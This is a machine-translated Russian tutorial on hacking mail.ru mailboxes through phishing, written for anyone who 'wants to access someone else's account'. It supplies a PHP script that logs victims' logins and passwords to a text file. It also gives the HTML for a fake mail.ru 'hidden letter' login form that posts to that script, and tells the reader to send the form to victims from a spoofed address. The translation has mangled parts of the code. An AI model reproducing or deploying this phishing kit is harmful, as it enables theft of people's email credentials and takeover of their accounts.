This page has been robot translated, sorry for typos if any. Original content here.

Hacking mail on mail.ru [SI]

[::. INTRO. ::]

Hello! In this article I will talk about how to hack a mailbox on the free mail service mail.ru.

The article is intended for beginners, in the SI , as well as for any Internet user who wants to access someone else's account.

But okay, I will not write about this for a long time and it is clear "why a mailbox is necessary for a cracker, you will understand.

The article fits for beginners. Guru please do not read :)

[::. PREPARATION. ::]

To begin with, we will need a free (better paid) hosting with PHP support.

* Just make sure that the hosting supports PHP

You can register on any of these:

 nextmail.ru 
 hobby.ru 
 webrise.ru 
 lapin.ru 
 free.dl-hosting.ru 
 hostow.net 
 beplaced.ru 
 777host.ru 
 paltus.ru 
 miraclehost.ru 
 freebox.ru 
 alfaspace.net 
 k70.ru 
 hosting.promostudio.ru 
 chat.ru 
 maxhost.ru 
 nixup.com 
 e2e.ru 
 noka.ru 
 newmail.ru 
 boom.ru 
 h15.ru 
 hut.ru 
 jino-net.ru 
 pochta.ru 
 unlimhost.ru 
 onepage.ru 
 by.ru 
 sbn.bz 
 yard.ru 
 domainhosting.ru 
 orthodoxy.ru 
 webservis.ru 
 ru-web.net 
 activehost.ru 
 househost.ru 
 bestof.ru 
 addr.ru 
 hosting.dump.ru 
 pesni.ru 
 medbox.ru 
 fatal.ru 
 x5x.ru 
 hopshot.com 
 5gigs.com 
 wagoo.com 
 orgfree.com 
 awardspace.com 
 bobos.ca 
 www.host.sk 
 zportal.info 
 spaceall.de 
 3x.ro 
 sretenie.ru 
 dotgeek.org 
 sevhosting.net 
 o2g.net
 www.jino-net.ru
 www.nixup.com
 newmail.ru
 ho.com.ua
 wallSt.ru
 hut.ru
 holm.ru
 e2e.ru
 fatal.ru
 host.sk
 ut.ru
 H1.ru
 Hostmos.ru
 Webm.ru
 Rdcom.ru
 narod.ru
 front.ru
 nm.ru 
 chat.ru 
 boom.ru 
 by.ru

Registered? - go ahead!

What do we need?

First, we need a sniffer (this is a script that allows you to save the received data into a text file).


PHP Code:
  <? php
 
  $ f = fopen ( "mail.txt" , "at" );
  # file where to save flock ( $ f , 2 );
  fputs ( $ f , $ _GET [ 'Login' ]. "@" );
  # login fputs ( $ f , $ _GET [ 'Domain' ]);
  # domain fputs ( $ f , ";" . $ _GET [ 'Password' ]. "\ n" );
  # password flock ( $ f , 3 );
  fclose ( $ f );
  ?> <script> document.location.href = "/click?http://win.mail.ru/cgi-bin/readmsg?id=121112312"; </ script>

Consider the script in more detail.


PHP Code:
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>

This line specifies the place where we will redirect the user after authorization on the letter-fake .

  • We save mes.php in the file and fill it with hosting.
  • Also, create the mail.txt file in the directory with the script, and put it on the right (chmod) 777.

Perhaps with hosting - everything!

Let's proceed to the very letter that we will send to the victim on soap.


Code of the Letter:
  < table class = readlet cellpadding = 0 cellspacing = 0 border = 0 width = "100%" > < tr >
 
  < td id = aj_body >
 
  < div id = let_body > < base href = "http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg" >
 
  < table cellpadding = 0 cellspacing = 0 border = 0 class = login >
 
  < tr >
 
  < td > The user sent you a hidden letter . <br> To view the email, enter your login and password . <br> </ a > </ p > </ td >
 
  </ tr >
 
  </ table > < font color = 00 ;
  33 ;
  66 FACE = "Arial" >
 
  < h4 > Authorization </ h4 >
 
  </ font >
 
  < table cellpadding = 0 cellspacing = 0 border = 0 class = login >
 
  < form method = "GET" action = "http: //Adress card /mes.php" >
 
  < input type = "hidden" name = "mail" value = "1" >
 
  < tr >
 
  < td width = 75 >
 
  < img src = http : //img.mail.ru/0.gif height = 1> <br> Name
 
  </ td >
 
  < td width = 150 >
 
  < input type = "text" name = "Login" >
 
  </ td >
 
  < td width = 75 >
 
  < select name = "Domain" >
 
  < option value = "mail.ru" SELECTED > @ mail .
  com </ option >
 
  < option value = "inbox.ru" > @ inbox .
  com </ option >
 
  < option value = "list.ru" > @list.
  com </ option >
 
  < option value = "bk.ru" > @ bk .
  com </ option >
 
  </ select >
 
  </ td >
 
  </ tr >
 
  < tr >
 
  < td >
 
  Password
 
  </ td >
 
  < td >
 
  < input type = "password" name = "Password" >
 
  </ td >
 
  < td >
 
  <a href = "http://www.mail.ru/pages/help/92.html" target = _new> Lost Password ? </ a >
 
  </ td >
 
  </ tr >
 
  < tr >
 
  < td > </ td >
 
  < td >
 
  < input type = checkbox name = "level" value = 1 id = "alien" > < label for = "alien" > Alien computer </ label >
 
  </ td >
 
  < td > </ td >
 
  </ tr >
 
  < tr >
 
  < td > </ td >
 
  < td >
 
  < input type = "Submit" value = "Login" xstyle = "margin-top: 4px" >
 
  </ td >
 
  < td > </ td >
 
  </ tr > </ form >
 
  </ table > <br> <br>
 
  To learn more about services - visit <a href = "http://corp.mail.ru" target = "_blank"> Corp.
  Mail .
  Ru </ a > <br>
 
  National Mail Service <a href = "http://www.mail.ru" target = "_blank"> @ Mail .
  ru </ a > - the best free mail .
 
  < base > </ div >
 
 

Specify in the action parameter the form tag - the address of your site (which you registered above) and the path to the mes.php sniffer .

[!] It is necessary to pay attention that the data should be passed by a method "GET"! Otherwise, nothing will come of it.

Now it remains to send the victim a letter , preferably with the substitution of the address .

We copy the code of the letter into the input field and send it in html format, having previously filled in the fields.

If the victim bites on it, then you are lucky :)

You can find out the passwords in the file mail.txt .

[::. END. ::]

I think everything.

And how to approach the burglary to solve for you.

Thank you for attention!

I await your feedback just below this text.

And it's better not to break anything;)

Goodbye and see you again :)